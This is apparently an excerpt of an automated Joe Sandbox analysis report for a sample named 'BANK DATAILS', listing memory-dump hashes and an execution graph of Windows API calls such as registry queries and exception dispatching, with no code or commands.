                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.289094509.0000000000EED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EED000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_eed000_BANK DATAILS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 8152930082c89606b46e72c4317e448f00c5026ebb3a6ce6bf6e153dd9417b35
                                                                                    • Instruction ID: bb0b9e94779d9a812063799a8ab69f27c13bce7e016a51487237ae1fddfc0ad4
                                                                                    • Opcode Fuzzy Hash: 8152930082c89606b46e72c4317e448f00c5026ebb3a6ce6bf6e153dd9417b35
                                                                                    • Instruction Fuzzy Hash: 52214675508288EFCB01CF11DDC0B66BBA5FB88318F24C96DE9095B762C336D84ACB61
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.289094509.0000000000EED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EED000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_eed000_BANK DATAILS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 6d99e063339a888ab5b3f2aeaf5c22e38670094d80c25423a16d8eb6b14a5766
                                                                                    • Instruction ID: a2299e43f4f31b9f72e0e2026ed08fe164e12a88f58124bf49756d592ed89709
                                                                                    • Opcode Fuzzy Hash: 6d99e063339a888ab5b3f2aeaf5c22e38670094d80c25423a16d8eb6b14a5766
                                                                                    • Instruction Fuzzy Hash: DB21927550D3C48FCB02CF20D994B15BF72EB46314F28C5EAD8498B697C33A984ACB62
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.289037599.0000000000EDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EDD000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_edd000_BANK DATAILS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 443a7f9af640cd919331e281847f8d6becf020b849bdf04c35086449af5cbafc
                                                                                    • Instruction ID: ccc9cac5e923986de0e053ac5218be2cb4ef5c5d3ae76770fd46fa38267816ce
                                                                                    • Opcode Fuzzy Hash: 443a7f9af640cd919331e281847f8d6becf020b849bdf04c35086449af5cbafc
                                                                                    • Instruction Fuzzy Hash: 3C11D376408280DFCB12CF10D9C4B16BF71FB94328F24C6AAD8455B756C336E856CBA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.289094509.0000000000EED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EED000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_eed000_BANK DATAILS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 7295738dd5415a26bb4c57afd7e216ba35a237fb4860c4a8b3290a6f7a399039
                                                                                    • Instruction ID: b9b57b5a17575555c940f85a9cf4a0461c4e7350e743cf4d89839ed60df19a1e
                                                                                    • Opcode Fuzzy Hash: 7295738dd5415a26bb4c57afd7e216ba35a237fb4860c4a8b3290a6f7a399039
                                                                                    • Instruction Fuzzy Hash: 0311DD75508284DFCB02CF10C9C4B15FBB1FB88328F28C6ADD9494B666C33AD85ACB61
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.289037599.0000000000EDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EDD000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_edd000_BANK DATAILS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a9f9e33b05c720b05344c04ac0b42be135b9487668d72f658a416de7f229037f
                                                                                    • Instruction ID: 427236268366b7c6507c3b228a3ad4f8685286e5e70348041ba9d7febdd31521
                                                                                    • Opcode Fuzzy Hash: a9f9e33b05c720b05344c04ac0b42be135b9487668d72f658a416de7f229037f
                                                                                    • Instruction Fuzzy Hash: CE01F77100C3849AE7109A15CD847A6BF98EF41378F18942BED5D6A742D379D845CAF1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.289037599.0000000000EDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EDD000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_edd000_BANK DATAILS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 4f4e43be965d7143c3bdafe63df1a188e78ce36797cf56929207d4b849e12f97
                                                                                    • Instruction ID: 952c4d9dda4c27623c1cd053a87a320bb534296c5010d5f36a60f2da3ed41dbb
                                                                                    • Opcode Fuzzy Hash: 4f4e43be965d7143c3bdafe63df1a188e78ce36797cf56929207d4b849e12f97
                                                                                    • Instruction Fuzzy Hash: DCF062714083849FEB208A15DD84B62FF98EB41778F18C46AED195B782C3799D44CAB1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.289317699.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_f40000_BANK DATAILS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 62d9cda10c0e20cbbd85d54c4c316f06711752a660d006a4a189eb613731f7e1
                                                                                    • Instruction ID: 5b70bd31247ada0ec75fdc8aca357ac70c7b56e3bdd0440b4995efcd0eccdba6
                                                                                    • Opcode Fuzzy Hash: 62d9cda10c0e20cbbd85d54c4c316f06711752a660d006a4a189eb613731f7e1
                                                                                    • Instruction Fuzzy Hash: E712D4F5C997468BE310CF65ECC81A93BA0B740328FDB4A08D2616BAD0D7B9056ECF44
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.289317699.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_f40000_BANK DATAILS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a718bbb7c64fd1ea6226f5378805df4d3d70d4acc044a230b60d70503efd5b69
                                                                                    • Instruction ID: 161a2059752d628863709ee1ffd6b5c4891a2d146e9c306dc4798721560667b2
                                                                                    • Opcode Fuzzy Hash: a718bbb7c64fd1ea6226f5378805df4d3d70d4acc044a230b60d70503efd5b69
                                                                                    • Instruction Fuzzy Hash: 49A1BF32E00219CFCF15DFA5C8849DEBBB2FF84304B19856AE815BB221EB75E915DB50
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.289317699.0000000000F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F40000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_f40000_BANK DATAILS.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ced5f5acf962b51c2462afb44d7cddfd4f2067fb7bbd49d0e2856d6886f50212
                                                                                    • Instruction ID: 09555eb29b1761f519609b90334679494f31875d466999186b7e65654738d2df
                                                                                    • Opcode Fuzzy Hash: ced5f5acf962b51c2462afb44d7cddfd4f2067fb7bbd49d0e2856d6886f50212
                                                                                    • Instruction Fuzzy Hash: E5C118F1C997468BD710CF65ECC81A93BA1BB45328FDB4A08D1616BAD0D7B8146ECF44
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Execution Graph

                                                                                    Execution Coverage:22.3%
                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                    Signature Coverage:0.4%
                                                                                    Total number of Nodes:820
                                                                                    Total number of Limit Nodes:44
                                                                                    execution_graph 44861 69b5488 44862 69b54a7 LdrInitializeThunk 44861->44862 44864 69b54db 44862->44864 43960 61e61d8 43962 61e61e1 43960->43962 43961 61e62d9 43962->43961 43967 61e6507 43962->43967 43972 61e64c1 43962->43972 43977 61e62e0 43962->43977 44028 61e62f0 43962->44028 43968 61e64c0 43967->43968 43969 61e64df 43968->43969 44079 69b67d0 43968->44079 44084 69b67e0 43968->44084 43969->43962 43973 61e64cf 43972->43973 43975 69b67d0 2 API calls 43973->43975 43976 69b67e0 2 API calls 43973->43976 43974 61e64df 43974->43962 43975->43974 43976->43974 43978 61e630f 43977->43978 43979 61e6337 43978->43979 44122 61e771f 43978->44122 44128 61e7462 43978->44128 44134 61e78e5 43978->44134 44138 61e70e4 43978->44138 44151 61e7769 43978->44151 44157 61e71ec 43978->44157 44167 61e7bef 43978->44167 44171 61e74f0 43978->44171 44177 61e7c77 43978->44177 44181 61e7979 43978->44181 44185 61e66fa 43978->44185 44193 61e727a 43978->44193 44203 61e757e 43978->44203 44209 61e7cc1 43978->44209 44213 61e72c1 43978->44213 44223 61e79c3 43978->44223 44227 61e75c5 43978->44227 44233 61e7a4b 43978->44233 44237 61e734f 43978->44237 44247 61e7ad3 43978->44247 44251 61e7653 43978->44251 44257 61e73d4 43978->44257 44263 61e76d8 43978->44263 44269 61e7b5b 43978->44269 44273 61e785d 43978->44273 44277 61e715e 43978->44277 44287 61e7121 43978->44287 44297 61e7ba5 43978->44297 44301 61e71a5 43978->44301 44311 61e78a7 43978->44311 44315 61e70a7 43978->44315 44339 61e74a9 43978->44339 44345 61e792f 43978->44345 44349 61e7233 43978->44349 44359 61e77b3 43978->44359 44365 61e7537 43978->44365 44371 61e7c39 43978->44371 44375 61e6708 43978->44375 44383 61e7308 43978->44383 44393 61e7a0d 43978->44393 44397 61e738d 43978->44397 44407 61e760c 43978->44407 44413 61e7b11 43978->44413 44417 61e7691 43978->44417 44423 61e7090 43978->44423 44454 61e7813 43978->44454 44458 61e7a95 43978->44458 44462 61e741b 43978->44462 44029 61e630f 44028->44029 44030 61e6337 44029->44030 44031 61e771f 2 API calls 44029->44031 44032 61e741b 2 API calls 44029->44032 44033 61e7a95 KiUserExceptionDispatcher 44029->44033 44034 61e7813 KiUserExceptionDispatcher 44029->44034 44035 61e7090 7 API calls 44029->44035 44036 61e7691 2 API calls 44029->44036 44037 61e7b11 KiUserExceptionDispatcher 44029->44037 44038 61e760c 2 API calls 44029->44038 44039 61e738d 3 API calls 44029->44039 44040 61e7a0d KiUserExceptionDispatcher 44029->44040 44041 61e7308 3 API calls 44029->44041 44042 61e6708 5 API calls 44029->44042 44043 61e7c39 KiUserExceptionDispatcher 44029->44043 44044 61e7537 2 API calls 44029->44044 44045 61e77b3 2 API calls 44029->44045 44046 61e7233 3 API calls 44029->44046 44047 61e792f KiUserExceptionDispatcher 44029->44047 44048 61e74a9 2 API calls 44029->44048 44049 61e70a7 7 API calls 44029->44049 44050 61e78a7 KiUserExceptionDispatcher 44029->44050 44051 61e71a5 3 API calls 44029->44051 44052 61e7ba5 KiUserExceptionDispatcher 44029->44052 44053 61e7121 3 API calls 44029->44053 44054 61e715e 3 API calls 44029->44054 44055 61e785d KiUserExceptionDispatcher 44029->44055 44056 61e7b5b KiUserExceptionDispatcher 44029->44056 44057 61e76d8 2 API calls 44029->44057 44058 61e73d4 2 API calls 44029->44058 44059 61e7653 2 API calls 44029->44059 44060 61e7ad3 KiUserExceptionDispatcher 44029->44060 44061 61e734f 3 API calls 44029->44061 44062 61e7a4b KiUserExceptionDispatcher 44029->44062 44063 61e75c5 2 API calls 44029->44063 44064 61e79c3 KiUserExceptionDispatcher 44029->44064 44065 61e72c1 3 API calls 44029->44065 44066 61e7cc1 KiUserExceptionDispatcher 44029->44066 44067 61e757e 2 API calls 44029->44067 44068 61e727a 3 API calls 44029->44068 44069 61e66fa 5 API calls 44029->44069 44070 61e7979 KiUserExceptionDispatcher 44029->44070 44071 61e7c77 KiUserExceptionDispatcher 44029->44071 44072 61e74f0 2 API calls 44029->44072 44073 61e7bef KiUserExceptionDispatcher 44029->44073 44074 61e71ec 3 API calls 44029->44074 44075 61e7769 2 API calls 44029->44075 44076 61e70e4 7 API calls 44029->44076 44077 61e78e5 KiUserExceptionDispatcher 44029->44077 44078 61e7462 2 API calls 44029->44078 44031->44030 44032->44030 44033->44030 44034->44030 44035->44030 44036->44030 44037->44030 44038->44030 44039->44030 44040->44030 44041->44030 44042->44030 44043->44030 44044->44030 44045->44030 44046->44030 44047->44030 44048->44030 44049->44030 44050->44030 44051->44030 44052->44030 44053->44030 44054->44030 44055->44030 44056->44030 44057->44030 44058->44030 44059->44030 44060->44030 44061->44030 44062->44030 44063->44030 44064->44030 44065->44030 44066->44030 44067->44030 44068->44030 44069->44030 44070->44030 44071->44030 44072->44030 44073->44030 44074->44030 44075->44030 44076->44030 44077->44030 44078->44030 44081 69b67d5 44079->44081 44080 69b6ad4 44080->43969 44081->44080 44083 69b7b48 GlobalMemoryStatusEx GlobalMemoryStatusEx 44081->44083 44089 69b6c88 44081->44089 44083->44081 44085 69b67f5 44084->44085 44086 69b6ad4 44085->44086 44087 69b6c88 2 API calls 44085->44087 44088 69b7b48 GlobalMemoryStatusEx GlobalMemoryStatusEx 44085->44088 44086->43969 44087->44085 44088->44085 44092 69b6d50 44089->44092 44093 69b6d64 44092->44093 44095 69b6caf 44092->44095 44096 69b6d50 2 API calls 44093->44096 44094 69b6d7a 44098 69b7b48 44094->44098 44095->44081 44096->44094 44099 69b7b53 44098->44099 44101 69b7b7b 44098->44101 44099->44095 44100 69b7bd1 44100->44095 44101->44100 44102 69b7c6f 44101->44102 44105 69b7c7d 44101->44105 44103 69b6c88 2 API calls 44102->44103 44104 69b7c76 44103->44104 44104->44095 44105->44104 44107 69b8048 44105->44107 44110 69b8080 44107->44110 44108 69b8056 44108->44104 44111 69b808d 44110->44111 44112 69b80b5 44110->44112 44111->44108 44118 69b6654 44112->44118 44114 69b80d6 44114->44108 44116 69b819e GlobalMemoryStatusEx 44117 69b81ce 44116->44117 44117->44108 44119 69b8158 GlobalMemoryStatusEx 44118->44119 44121 69b80d2 44119->44121 44121->44114 44121->44116 44123 61e7731 KiUserExceptionDispatcher 44122->44123 44125 61e77f8 44123->44125 44126 61e7cea KiUserExceptionDispatcher 44125->44126 44127 61e7d09 44126->44127 44127->43979 44129 61e7474 44128->44129 44130 61e77dc KiUserExceptionDispatcher 44129->44130 44131 61e77f8 44130->44131 44132 61e7cea KiUserExceptionDispatcher 44131->44132 44133 61e7d09 44132->44133 44133->43979 44135 61e78f7 44134->44135 44136 61e7cea KiUserExceptionDispatcher 44135->44136 44137 61e7d09 44136->44137 44137->43979 44139 61e70f6 44138->44139 44468 6826687 44139->44468 44473 68266c8 44139->44473 44140 61e7110 44141 61e73b9 44140->44141 44478 682c750 44140->44478 44483 682cd5e 44140->44483 44487 682c7b0 44140->44487 44142 61e77dc KiUserExceptionDispatcher 44141->44142 44143 61e77f8 44142->44143 44144 61e7cea KiUserExceptionDispatcher 44143->44144 44145 61e7d09 44144->44145 44145->43979 44152 61e777b KiUserExceptionDispatcher 44151->44152 44154 61e77f8 44152->44154 44155 61e7cea KiUserExceptionDispatcher 44154->44155 44156 61e7d09 44155->44156 44156->43979 44158 61e71fe 44157->44158 44159 61e73b9 44158->44159 44164 682c7b0 RegQueryValueExW 44158->44164 44165 682c750 RegQueryValueExW 44158->44165 44166 682cd5e RegQueryValueExW 44158->44166 44160 61e77dc KiUserExceptionDispatcher 44159->44160 44161 61e77f8 44160->44161 44162 61e7cea KiUserExceptionDispatcher 44161->44162 44163 61e7d09 44162->44163 44163->43979 44164->44159 44165->44159 44166->44159 44168 61e7c01 44167->44168 44169 61e7cea KiUserExceptionDispatcher 44168->44169 44170 61e7d09 44169->44170 44170->43979 44172 61e7502 44171->44172 44173 61e77dc KiUserExceptionDispatcher 44172->44173 44174 61e77f8 44173->44174 44175 61e7cea KiUserExceptionDispatcher 44174->44175 44176 61e7d09 44175->44176 44176->43979 44178 61e7c89 44177->44178 44179 61e7cea KiUserExceptionDispatcher 44178->44179 44180 61e7d09 44179->44180 44180->43979 44182 61e798b 44181->44182 44183 61e7cea KiUserExceptionDispatcher 44182->44183 44184 61e7d09 44183->44184 44184->43979 44186 61e6708 44185->44186 44758 61e9268 44186->44758 44763 61e923f 44186->44763 44187 61e7058 44188 61e6fe7 44188->44187 44768 6824de8 44188->44768 44774 6824dd8 44188->44774 44194 61e728c 44193->44194 44195 61e73b9 44194->44195 44200 682c7b0 RegQueryValueExW 44194->44200 44201 682c750 RegQueryValueExW 44194->44201 44202 682cd5e RegQueryValueExW 44194->44202 44196 61e77dc KiUserExceptionDispatcher 44195->44196 44197 61e77f8 44196->44197 44198 61e7cea KiUserExceptionDispatcher 44197->44198 44199 61e7d09 44198->44199 44199->43979 44200->44195 44201->44195 44202->44195 44204 61e7590 KiUserExceptionDispatcher 44203->44204 44206 61e77f8 44204->44206 44207 61e7cea KiUserExceptionDispatcher 44206->44207 44208 61e7d09 44207->44208 44208->43979 44210 61e7cd3 KiUserExceptionDispatcher 44209->44210 44212 61e7d09 44210->44212 44212->43979 44214 61e72d3 44213->44214 44215 61e73b9 44214->44215 44220 682c7b0 RegQueryValueExW 44214->44220 44221 682c750 RegQueryValueExW 44214->44221 44222 682cd5e RegQueryValueExW 44214->44222 44216 61e77dc KiUserExceptionDispatcher 44215->44216 44217 61e77f8 44216->44217 44218 61e7cea KiUserExceptionDispatcher 44217->44218 44219 61e7d09 44218->44219 44219->43979 44220->44215 44221->44215 44222->44215 44224 61e79d5 44223->44224 44225 61e7cea KiUserExceptionDispatcher 44224->44225 44226 61e7d09 44225->44226 44226->43979 44228 61e75d7 KiUserExceptionDispatcher 44227->44228 44230 61e77f8 44228->44230 44231 61e7cea KiUserExceptionDispatcher 44230->44231 44232 61e7d09 44231->44232 44232->43979 44234 61e7a5d 44233->44234 44235 61e7cea KiUserExceptionDispatcher 44234->44235 44236 61e7d09 44235->44236 44236->43979 44238 61e7361 44237->44238 44239 61e73b9 44238->44239 44244 682c7b0 RegQueryValueExW 44238->44244 44245 682c750 RegQueryValueExW 44238->44245 44246 682cd5e RegQueryValueExW 44238->44246 44240 61e77dc KiUserExceptionDispatcher 44239->44240 44241 61e77f8 44240->44241 44242 61e7cea KiUserExceptionDispatcher 44241->44242 44243 61e7d09 44242->44243 44243->43979 44244->44239 44245->44239 44246->44239 44248 61e7ae5 44247->44248 44249 61e7cea KiUserExceptionDispatcher 44248->44249 44250 61e7d09 44249->44250 44250->43979 44252 61e7665 KiUserExceptionDispatcher 44251->44252 44254 61e77f8 44252->44254 44255 61e7cea KiUserExceptionDispatcher 44254->44255 44256 61e7d09 44255->44256 44256->43979 44258 61e73e6 44257->44258 44259 61e77dc KiUserExceptionDispatcher 44258->44259 44260 61e77f8 44259->44260 44261 61e7cea KiUserExceptionDispatcher 44260->44261 44262 61e7d09 44261->44262 44262->43979 44264 61e76ea KiUserExceptionDispatcher 44263->44264 44266 61e77f8 44264->44266 44267 61e7cea KiUserExceptionDispatcher 44266->44267 44268 61e7d09 44267->44268 44268->43979 44270 61e7b6d 44269->44270 44271 61e7cea KiUserExceptionDispatcher 44270->44271 44272 61e7d09 44271->44272 44272->43979 44274 61e786f 44273->44274 44275 61e7cea KiUserExceptionDispatcher 44274->44275 44276 61e7d09 44275->44276 44276->43979 44278 61e7170 44277->44278 44279 61e73b9 44278->44279 44284 682c7b0 RegQueryValueExW 44278->44284 44285 682c750 RegQueryValueExW 44278->44285 44286 682cd5e RegQueryValueExW 44278->44286 44280 61e77dc KiUserExceptionDispatcher 44279->44280 44281 61e77f8 44280->44281 44282 61e7cea KiUserExceptionDispatcher 44281->44282 44283 61e7d09 44282->44283 44283->43979 44284->44279 44285->44279 44286->44279 44288 61e7133 44287->44288 44289 61e73b9 44288->44289 44294 682c7b0 RegQueryValueExW 44288->44294 44295 682c750 RegQueryValueExW 44288->44295 44296 682cd5e RegQueryValueExW 44288->44296 44290 61e77dc KiUserExceptionDispatcher 44289->44290 44291 61e77f8 44290->44291 44292 61e7cea KiUserExceptionDispatcher 44291->44292 44293 61e7d09 44292->44293 44293->43979 44294->44289 44295->44289 44296->44289 44298 61e7bb7 44297->44298 44299 61e7cea KiUserExceptionDispatcher 44298->44299 44300 61e7d09 44299->44300 44300->43979 44302 61e71b7 44301->44302 44303 61e73b9 44302->44303 44308 682c7b0 RegQueryValueExW 44302->44308 44309 682c750 RegQueryValueExW 44302->44309 44310 682cd5e RegQueryValueExW 44302->44310 44304 61e77dc KiUserExceptionDispatcher 44303->44304 44305 61e77f8 44304->44305 44306 61e7cea KiUserExceptionDispatcher 44305->44306 44307 61e7d09 44306->44307 44307->43979 44308->44303 44309->44303 44310->44303 44312 61e78b9 44311->44312 44313 61e7cea KiUserExceptionDispatcher 44312->44313 44314 61e7d09 44313->44314 44314->43979 44316 61e70b9 44315->44316 44327 6824eb0 5 API calls 44316->44327 44328 6824e60 5 API calls 44316->44328 44330 68251d0 5 API calls 44316->44330 44333 6825168 5 API calls 44316->44333 44335 6824f4e 5 API calls 44316->44335 44336 6824e4f 5 API calls 44316->44336 44797 6825757 44316->44797 44805 682558a 44316->44805 44813 6825858 44316->44813 44821 6825440 44316->44821 44317 61e70d3 44337 6826687 5 API calls 44317->44337 44338 68266c8 5 API calls 44317->44338 44318 61e7110 44319 61e73b9 44318->44319 44324 682c7b0 RegQueryValueExW 44318->44324 44325 682c750 RegQueryValueExW 44318->44325 44326 682cd5e RegQueryValueExW 44318->44326 44320 61e77dc KiUserExceptionDispatcher 44319->44320 44321 61e77f8 44320->44321 44322 61e7cea KiUserExceptionDispatcher 44321->44322 44323 61e7d09 44322->44323 44323->43979 44324->44319 44325->44319 44326->44319 44327->44317 44328->44317 44330->44317 44333->44317 44335->44317 44336->44317 44337->44318 44338->44318 44340 61e74bb 44339->44340 44341 61e77dc KiUserExceptionDispatcher 44340->44341 44342 61e77f8 44341->44342 44343 61e7cea KiUserExceptionDispatcher 44342->44343 44344 61e7d09 44343->44344 44344->43979 44346 61e7941 44345->44346 44347 61e7cea KiUserExceptionDispatcher 44346->44347 44348 61e7d09 44347->44348 44348->43979 44350 61e7245 44349->44350 44351 61e73b9 44350->44351 44356 682c7b0 RegQueryValueExW 44350->44356 44357 682c750 RegQueryValueExW 44350->44357 44358 682cd5e RegQueryValueExW 44350->44358 44352 61e77dc KiUserExceptionDispatcher 44351->44352 44353 61e77f8 44352->44353 44354 61e7cea KiUserExceptionDispatcher 44353->44354 44355 61e7d09 44354->44355 44355->43979 44356->44351 44357->44351 44358->44351 44360 61e77c5 KiUserExceptionDispatcher 44359->44360 44362 61e77f8 44360->44362 44363 61e7cea KiUserExceptionDispatcher 44362->44363 44364 61e7d09 44363->44364 44364->43979 44366 61e7549 KiUserExceptionDispatcher 44365->44366 44368 61e77f8 44366->44368 44369 61e7cea KiUserExceptionDispatcher 44368->44369 44370 61e7d09 44369->44370 44370->43979 44372 61e7c4b 44371->44372 44373 61e7cea KiUserExceptionDispatcher 44372->44373 44374 61e7d09 44373->44374 44374->43979 44376 61e672d 44375->44376 44379 61e923f 5 API calls 44376->44379 44380 61e9268 5 API calls 44376->44380 44377 61e7058 44378 61e6fe7 44378->44377 44381 6824dd8 5 API calls 44378->44381 44382 6824de8 5 API calls 44378->44382 44379->44378 44380->44378 44381->44378 44382->44378 44384 61e731a 44383->44384 44385 61e73b9 44384->44385 44390 682c7b0 RegQueryValueExW 44384->44390 44391 682c750 RegQueryValueExW 44384->44391 44392 682cd5e RegQueryValueExW 44384->44392 44386 61e77dc KiUserExceptionDispatcher 44385->44386 44387 61e77f8 44386->44387 44388 61e7cea KiUserExceptionDispatcher 44387->44388 44389 61e7d09 44388->44389 44389->43979 44390->44385 44391->44385 44392->44385 44394 61e7a1f 44393->44394 44395 61e7cea KiUserExceptionDispatcher 44394->44395 44396 61e7d09 44395->44396 44396->43979 44398 61e739f 44397->44398 44399 61e73b9 44398->44399 44404 682c7b0 RegQueryValueExW 44398->44404 44405 682c750 RegQueryValueExW 44398->44405 44406 682cd5e RegQueryValueExW 44398->44406 44400 61e77dc KiUserExceptionDispatcher 44399->44400 44401 61e77f8 44400->44401 44402 61e7cea KiUserExceptionDispatcher 44401->44402 44403 61e7d09 44402->44403 44403->43979 44404->44399 44405->44399 44406->44399 44408 61e761e KiUserExceptionDispatcher 44407->44408 44410 61e77f8 44408->44410 44411 61e7cea KiUserExceptionDispatcher 44410->44411 44412 61e7d09 44411->44412 44412->43979 44414 61e7b23 44413->44414 44415 61e7cea KiUserExceptionDispatcher 44414->44415 44416 61e7d09 44415->44416 44416->43979 44418 61e76a3 KiUserExceptionDispatcher 44417->44418 44420 61e77f8 44418->44420 44421 61e7cea KiUserExceptionDispatcher 44420->44421 44422 61e7d09 44421->44422 44422->43979 44432 6824eb0 5 API calls 44423->44432 44433 6824e60 5 API calls 44423->44433 44434 6825440 5 API calls 44423->44434 44435 68251d0 5 API calls 44423->44435 44436 6825168 5 API calls 44423->44436 44437 6824f4e 5 API calls 44423->44437 44438 6824e4f 5 API calls 44423->44438 44424 61e7096 44439 6824eb0 5 API calls 44424->44439 44440 6824e60 5 API calls 44424->44440 44441 6825440 5 API calls 44424->44441 44442 68251d0 5 API calls 44424->44442 44443 6825757 5 API calls 44424->44443 44444 682558a 5 API calls 44424->44444 44445 6825168 5 API calls 44424->44445 44446 6825858 5 API calls 44424->44446 44447 6824f4e 5 API calls 44424->44447 44448 6824e4f 5 API calls 44424->44448 44425 61e70d3 44449 6826687 5 API calls 44425->44449 44450 68266c8 5 API calls 44425->44450 44426 61e7110 44427 61e73b9 44426->44427 44451 682c7b0 RegQueryValueExW 44426->44451 44452 682c750 RegQueryValueExW 44426->44452 44453 682cd5e RegQueryValueExW 44426->44453 44428 61e77dc KiUserExceptionDispatcher 44427->44428 44429 61e77f8 44428->44429 44430 61e7cea KiUserExceptionDispatcher 44429->44430 44431 61e7d09 44430->44431 44431->43979 44432->44424 44433->44424 44434->44424 44435->44424 44436->44424 44437->44424 44438->44424 44439->44425 44440->44425 44441->44425 44442->44425 44443->44425 44444->44425 44445->44425 44446->44425 44447->44425 44448->44425 44449->44426 44450->44426 44451->44427 44452->44427 44453->44427 44455 61e7825 44454->44455 44456 61e7cea KiUserExceptionDispatcher 44455->44456 44457 61e7d09 44456->44457 44457->43979 44459 61e7aa7 44458->44459 44460 61e7cea KiUserExceptionDispatcher 44459->44460 44461 61e7d09 44460->44461 44461->43979 44463 61e742d 44462->44463 44464 61e77dc KiUserExceptionDispatcher 44463->44464 44465 61e77f8 44464->44465 44466 61e7cea KiUserExceptionDispatcher 44465->44466 44467 61e7d09 44466->44467 44467->43979 44469 6826695 44468->44469 44491 1592dd0 44469->44491 44498 1592de0 44469->44498 44470 6826759 44470->44140 44474 68266ed 44473->44474 44476 1592dd0 5 API calls 44474->44476 44477 1592de0 5 API calls 44474->44477 44475 6826759 44475->44140 44476->44475 44477->44475 44479 682c771 44478->44479 44481 682c794 44478->44481 44479->44141 44482 682c821 44481->44482 44753 6825dd8 44481->44753 44482->44141 44485 682cc74 44483->44485 44484 6825dd8 RegQueryValueExW 44484->44485 44485->44484 44486 682cd84 44485->44486 44486->44141 44489 682c7d1 44487->44489 44488 6825dd8 RegQueryValueExW 44488->44489 44489->44488 44490 682c821 44489->44490 44490->44141 44492 1592df1 44491->44492 44493 1592e92 44492->44493 44505 6827268 44492->44505 44520 6827258 44492->44520 44535 68274aa 44492->44535 44548 682731d 44492->44548 44493->44470 44499 1592df1 44498->44499 44500 1592e92 44499->44500 44501 68274aa 5 API calls 44499->44501 44502 6827258 5 API calls 44499->44502 44503 6827268 5 API calls 44499->44503 44504 682731d 5 API calls 44499->44504 44500->44470 44501->44500 44502->44500 44503->44500 44504->44500 44506 682726c 44505->44506 44561 68251d0 44506->44561 44508 68274e4 44508->44493 44509 68274ef 44511 6827521 44509->44511 44569 61eadf9 44509->44569 44583 61eaf70 44509->44583 44589 61eae08 44509->44589 44511->44493 44512 6827604 44513 6827620 44512->44513 44603 61eb720 44512->44603 44619 61eb730 44512->44619 44513->44493 44514 68272a1 44514->44508 44514->44509 44635 6824e60 44514->44635 44521 682725a 44520->44521 44522 68251d0 5 API calls 44521->44522 44529 68272a1 44522->44529 44523 68274e4 44523->44493 44524 6824e60 5 API calls 44524->44529 44525 6827521 44525->44493 44526 68274ef 44526->44525 44530 61eae08 5 API calls 44526->44530 44531 61eadf9 5 API calls 44526->44531 44532 61eaf70 5 API calls 44526->44532 44527 6827604 44528 6827620 44527->44528 44533 61eb730 5 API calls 44527->44533 44534 61eb720 5 API calls 44527->44534 44528->44493 44529->44523 44529->44524 44529->44526 44530->44527 44531->44527 44532->44527 44533->44528 44534->44528 44540 68272da 44535->44540 44536 68274e4 44536->44493 44537 6827521 